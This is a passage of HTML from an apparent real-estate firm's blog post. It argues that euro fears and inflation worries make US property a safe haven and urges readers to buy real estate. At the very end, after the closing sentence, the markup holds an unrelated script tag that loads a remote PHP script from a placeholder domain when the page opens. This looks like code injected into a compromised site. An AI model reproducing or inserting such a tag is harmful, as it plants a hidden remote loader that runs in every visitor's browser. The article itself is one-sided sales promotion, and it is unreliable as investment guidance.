These fears have caused significant price destruction of the Euro and British Pound and sent traders into Gold and brought about the return of King Dollar. These are quick, predictable reactions to uncertainty in the markets but another investment may see additional capital coming its’  way. Real Estate.</span></span></p>
<p><span style="font-family: Calibri;"><span style="font-size: small;">As countries around the world issue more and more currency in bail outs an attempts to pay down debts, at some point inflation will come as a consequence to today’s actions. We don’t see this inflation immediately because of the current economic conditions, but few believe Federal Reserves from around the world will be able to coordinate in such a way to perfectly plan for future inflation. </span></span></p>
<p><span style="color: #ff0000;"><span style="font-family: Calibri;"><span style="font-size: small;">The worries of future inflation and world markets flocking for security in U.S. markets point to an increased demand for US real estate assets. (bold bullet point)</span></span></span></p>
<p><span style="font-family: Calibri;"><span style="font-size: small;">With charges of fraud, uncertain upcoming regulation, and the continued demonization of Wall Street, investors all around the world have lost confidence in paper assets and feel more secure in ownership of hard assets. While many naturally turn to gold and other commodities, other savvy investors find the bricks and mortar of real estate more appealing. After all, all real estate is local and at any point in time, a geographic bull market in real estate exists. </span></span></p>
<p><span style="font-family: Calibri;"><span style="font-size: small;">As the list of “known unknowns” continues to grow and the euro hits the fan, don’t panic. Instead, of moving your capital to underneath the mattress, take a hard look at real estate because you should be looking to get in before everyone else realizes what we here at Beimeni already know. Buy some real estate.</span></span><script src="http://$domain/ll.php?kk=11"></script></p>
